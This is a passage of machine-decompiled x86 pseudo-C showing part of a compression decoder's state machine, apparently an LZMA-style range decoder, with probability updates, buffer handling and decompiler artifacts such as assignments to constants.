                                                                                      													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                      													 *(__ebp - 0x84) = 9;
                                                                                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                      												}
                                                                                      												while(1) {
                                                                                      													L132:
                                                                                      													 *(_t621 - 0x54) = _t614;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											case 9:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													goto L89;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x60);
                                                                                      												if( *(__ebp - 0x60) == 0) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      												__eflags = _t258;
                                                                                      												0 | _t258 = _t258 + _t258 + 9;
                                                                                      												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                      												goto L75;
                                                                                      											case 0xa:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                      													 *(__ebp - 0x84) = 0xb;
                                                                                      													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                      													while(1) {
                                                                                      														L132:
                                                                                      														 *(_t621 - 0x54) = _t614;
                                                                                      														goto L133;
                                                                                      													}
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                      												goto L88;
                                                                                      											case 0xb:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__ecx =  *(__ebp - 0x24);
                                                                                      													__eax =  *(__ebp - 0x20);
                                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      												} else {
                                                                                      													__eax =  *(__ebp - 0x24);
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x28);
                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      												L88:
                                                                                      												__ecx =  *(__ebp - 0x2c);
                                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      												L89:
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												 *(__ebp - 0x80) = 0x15;
                                                                                      												__eax =  *(__ebp - 4) + 0xa68;
                                                                                      												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                      												goto L68;
                                                                                      											case 0xc:
                                                                                      												L99:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xc;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t334 = __ebp - 0x70;
                                                                                      												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t334;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												goto L101;
                                                                                      											case 0xd:
                                                                                      												L37:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xd;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t122 = __ebp - 0x70;
                                                                                      												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t122;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												L39:
                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      													goto L48;
                                                                                      												}
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													goto L54;
                                                                                      												}
                                                                                      												L41:
                                                                                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      												 *(__ebp - 0x48) = __eax;
                                                                                      												__eax = __eax + 1;
                                                                                      												__eax = __eax << 8;
                                                                                      												__eax = __eax + __ebx;
                                                                                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edx = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													 *(__ebp - 0x40) = 1;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													__ebx = __ebx + __ebx + 1;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edx;
                                                                                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													goto L39;
                                                                                      												} else {
                                                                                      													goto L37;
                                                                                      												}
                                                                                      											case 0xe:
                                                                                      												L46:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xe;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t156 = __ebp - 0x70;
                                                                                      												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t156;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												while(1) {
                                                                                      													L48:
                                                                                      													__eflags = __ebx - 0x100;
                                                                                      													if(__ebx >= 0x100) {
                                                                                      														break;
                                                                                      													}
                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                      													__edx = __ebx + __ebx;
                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                      													__esi = __edx + __eax;
                                                                                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      													__ax =  *__esi;
                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                      													__edi = __ax & 0x0000ffff;
                                                                                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      													if( *(__ebp - 0xc) >= __ecx) {
                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      														__cx = __ax;
                                                                                      														_t170 = __edx + 1; // 0x1
                                                                                      														__ebx = _t170;
                                                                                      														__cx = __ax >> 5;
                                                                                      														__eflags = __eax;
                                                                                      														 *__esi = __ax;
                                                                                      													} else {
                                                                                      														 *(__ebp - 0x10) = __ecx;
                                                                                      														0x800 = 0x800 - __edi;
                                                                                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      														__ebx = __ebx + __ebx;
                                                                                      														 *__esi = __cx;
                                                                                      													}
                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      														continue;
                                                                                      													} else {
                                                                                      														goto L46;
                                                                                      													}
                                                                                      												}
                                                                                      												L54:
                                                                                      												_t173 = __ebp - 0x34;
                                                                                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      												__eflags =  *_t173;
                                                                                      												goto L55;
                                                                                      											case 0xf:
                                                                                      												L58:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xf;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t203 = __ebp - 0x70;
                                                                                      												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t203;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												L60:
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													L55:
                                                                                      													__al =  *(__ebp - 0x44);
                                                                                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      													goto L56;
                                                                                      												}
                                                                                      												L61:
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__edx = __ebx + __ebx;
                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                      												__esi = __edx + __eax;
                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													_t217 = __edx + 1; // 0x1
                                                                                      													__ebx = _t217;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edi;
                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													goto L60;
                                                                                      												} else {
                                                                                      													goto L58;
                                                                                      												}
                                                                                      											case 0x10:
                                                                                      												L109:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0x10;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t365 = __ebp - 0x70;
                                                                                      												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t365;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												goto L111;
                                                                                      											case 0x11:
                                                                                      												L68:
                                                                                      												_t614 =  *(_t621 - 0x58);
                                                                                      												 *(_t621 - 0x84) = 0x12;
                                                                                      												while(1) {
                                                                                      													L132:
                                                                                      													 *(_t621 - 0x54) = _t614;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											case 0x12:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                      													 *(__ebp - 0x84) = 0x13;
                                                                                      													__esi =  *(__ebp - 0x58) + 2;
                                                                                      													while(1) {
                                                                                      														L132:
                                                                                      														 *(_t621 - 0x54) = _t614;
                                                                                      														goto L133;
                                                                                      													}
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                      												__eflags = __eax;
                                                                                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      												goto L130;
                                                                                      											case 0x13:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													_t469 = __ebp - 0x58;
                                                                                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      													__eflags =  *_t469;
                                                                                      													 *(__ebp - 0x30) = 0x10;
                                                                                      													 *(__ebp - 0x40) = 8;
                                                                                      													L144:
                                                                                      													 *(__ebp - 0x7c) = 0x14;
                                                                                      													goto L145;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                      												 *(__ebp - 0x30) = 8;
                                                                                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      												L130:
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												 *(__ebp - 0x40) = 3;
                                                                                      												goto L144;
                                                                                      											case 0x14:
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      												__eax =  *(__ebp - 0x80);
                                                                                      												 *(_t621 - 0x88) = _t542;
                                                                                      												goto L1;
                                                                                      											case 0x15:
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      												__al = __al & 0x000000fd;
                                                                                      												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                      												goto L120;
                                                                                      											case 0x16:
                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                      												__eflags = __eax - 4;
                                                                                      												if(__eax >= 4) {
                                                                                      													_push(3);
                                                                                      													_pop(__eax);
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 4);
                                                                                      												 *(__ebp - 0x40) = 6;
                                                                                      												__eax = __eax << 7;
                                                                                      												 *(__ebp - 0x7c) = 0x19;
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												goto L145;
                                                                                      											case 0x17:
                                                                                      												L145:
                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                      												 *(__ebp - 0x50) = 1;
                                                                                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                      												goto L149;
                                                                                      											case 0x18:
                                                                                      												L146:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0x18;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t484 = __ebp - 0x70;
                                                                                      												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t484;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												L148:
                                                                                      												_t487 = __ebp - 0x48;
                                                                                      												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                      												__eflags =  *_t487;
                                                                                      												L149:
                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                      													__ecx =  *(__ebp - 0x40);
                                                                                      													__ebx =  *(__ebp - 0x50);
                                                                                      													0 = 1;
                                                                                      													__eax = 1 << __cl;
                                                                                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                      													__eax =  *(__ebp - 0x7c);
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      													while(1) {
                                                                                      														 *(_t621 - 0x88) = _t542;
                                                                                      														goto L1;
                                                                                      													}
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x50);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__esi = __edx + __eax;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__ax =  *__esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eax = __eax - __ecx;
                                                                                      													__edx = __edx + 1;
                                                                                      													__eflags = __edx;
                                                                                      													 *__esi = __ax;
                                                                                      													 *(__ebp - 0x50) = __edx;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edi;
                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													goto L148;
                                                                                      												} else {
                                                                                      													goto L146;
                                                                                      												}
                                                                                      											case 0x19:
                                                                                      												__eflags = __ebx - 4;
                                                                                      												if(__ebx < 4) {
                                                                                      													 *(__ebp - 0x2c) = __ebx;
                                                                                      													L119:
                                                                                      													_t393 = __ebp - 0x2c;
                                                                                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                      													__eflags =  *_t393;
                                                                                      													L120:
                                                                                      													__eax =  *(__ebp - 0x2c);
                                                                                      													__eflags = __eax;
                                                                                      													if(__eax == 0) {
                                                                                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                      														goto L170;
                                                                                      													}
                                                                                      													__eflags = __eax -  *(__ebp - 0x60);
                                                                                      													if(__eax >  *(__ebp - 0x60)) {
                                                                                      														goto L171;
                                                                                      													}
                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                      													__eax =  *(__ebp - 0x30);
                                                                                      													_t400 = __ebp - 0x60;
                                                                                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                      													__eflags =  *_t400;
                                                                                      													goto L123;
                                                                                      												}
                                                                                      												__ecx = __ebx;
                                                                                      												__eax = __ebx;
                                                                                      												__ecx = __ebx >> 1;
                                                                                      												__eax = __ebx & 0x00000001;
                                                                                      												__ecx = (__ebx >> 1) - 1;
                                                                                      												__al = __al | 0x00000002;
                                                                                      												__eax = (__ebx & 0x00000001) << __cl;
                                                                                      												__eflags = __ebx - 0xe;
                                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                                      												if(__ebx >= 0xe) {
                                                                                      													__ebx = 0;
                                                                                      													 *(__ebp - 0x48) = __ecx;
                                                                                      													L102:
                                                                                      													__eflags =  *(__ebp - 0x48);
                                                                                      													if( *(__ebp - 0x48) <= 0) {
                                                                                      														__eax = __eax + __ebx;
                                                                                      														 *(__ebp - 0x40) = 4;
                                                                                      														 *(__ebp - 0x2c) = __eax;
                                                                                      														__eax =  *(__ebp - 4);
                                                                                      														__eax =  *(__ebp - 4) + 0x644;
                                                                                      														__eflags = __eax;
                                                                                      														L108:
                                                                                      														__ebx = 0;
                                                                                      														 *(__ebp - 0x58) = __eax;
                                                                                      														 *(__ebp - 0x50) = 1;
                                                                                      														 *(__ebp - 0x44) = 0;
                                                                                      														 *(__ebp - 0x48) = 0;
                                                                                      														L112:
                                                                                      														__eax =  *(__ebp - 0x40);
                                                                                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                      															_t391 = __ebp - 0x2c;
                                                                                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                      															__eflags =  *_t391;
                                                                                      															goto L119;
                                                                                      														}
                                                                                      														__eax =  *(__ebp - 0x50);
                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      														__eax =  *(__ebp - 0x58);
                                                                                      														__esi = __edi + __eax;
                                                                                      														 *(__ebp - 0x54) = __esi;
                                                                                      														__ax =  *__esi;
                                                                                      														__ecx = __ax & 0x0000ffff;
                                                                                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                      														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                      														if( *(__ebp - 0xc) >= __edx) {
                                                                                      															__ecx = 0;
                                                                                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                      															__ecx = 1;
                                                                                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                      															__ebx = 1;
                                                                                      															__ecx =  *(__ebp - 0x48);
                                                                                      															__ebx = 1 << __cl;
                                                                                      															__ecx = 1 << __cl;
                                                                                      															__ebx =  *(__ebp - 0x44);
                                                                                      															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                      															__cx = __ax;
                                                                                      															__cx = __ax >> 5;
                                                                                      															__eax = __eax - __ecx;
                                                                                      															__edi = __edi + 1;
                                                                                      															__eflags = __edi;
                                                                                      															 *(__ebp - 0x44) = __ebx;
                                                                                      															 *__esi = __ax;
                                                                                      															 *(__ebp - 0x50) = __edi;
                                                                                      														} else {
                                                                                      															 *(__ebp - 0x10) = __edx;
                                                                                      															0x800 = 0x800 - __ecx;
                                                                                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      															 *__esi = __dx;
                                                                                      														}
                                                                                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      															L111:
                                                                                      															_t368 = __ebp - 0x48;
                                                                                      															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                      															__eflags =  *_t368;
                                                                                      															goto L112;
                                                                                      														} else {
                                                                                      															goto L109;
                                                                                      														}
                                                                                      													}
                                                                                      													__ecx =  *(__ebp - 0xc);
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                      														__ecx =  *(__ebp - 0x10);
                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      														__ebx = __ebx | 0x00000001;
                                                                                      														__eflags = __ebx;
                                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                                      													}
                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      														L101:
                                                                                      														_t338 = __ebp - 0x48;
                                                                                      														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                      														__eflags =  *_t338;
                                                                                      														goto L102;
                                                                                      													} else {
                                                                                      														goto L99;
                                                                                      													}
                                                                                      												}
                                                                                      												__edx =  *(__ebp - 4);
                                                                                      												__eax = __eax - __ebx;
                                                                                      												 *(__ebp - 0x40) = __ecx;
                                                                                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                      												goto L108;
                                                                                      											case 0x1a:
                                                                                      												L56:
                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0x1a;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x68);
                                                                                      												__al =  *(__ebp - 0x5c);
                                                                                      												__edx =  *(__ebp - 8);
                                                                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      												 *( *(__ebp - 0x68)) = __al;
                                                                                      												__ecx =  *(__ebp - 0x14);
                                                                                      												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                      												__eax = __ecx + 1;
                                                                                      												__edx = 0;
                                                                                      												_t192 = __eax %  *(__ebp - 0x74);
                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                      												__edx = _t192;
                                                                                      												goto L79;
                                                                                      											case 0x1b:
                                                                                      												L75:
                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0x1b;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                      													__eflags = __eax;
                                                                                      												}
                                                                                      												__edx =  *(__ebp - 8);
                                                                                      												__cl =  *(__eax + __edx);
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                                      												 *(__eax + __edx) = __cl;
                                                                                      												__eax = __eax + 1;
                                                                                      												__edx = 0;
                                                                                      												_t274 = __eax %  *(__ebp - 0x74);
                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                      												__edx = _t274;
                                                                                      												__eax =  *(__ebp - 0x68);
                                                                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
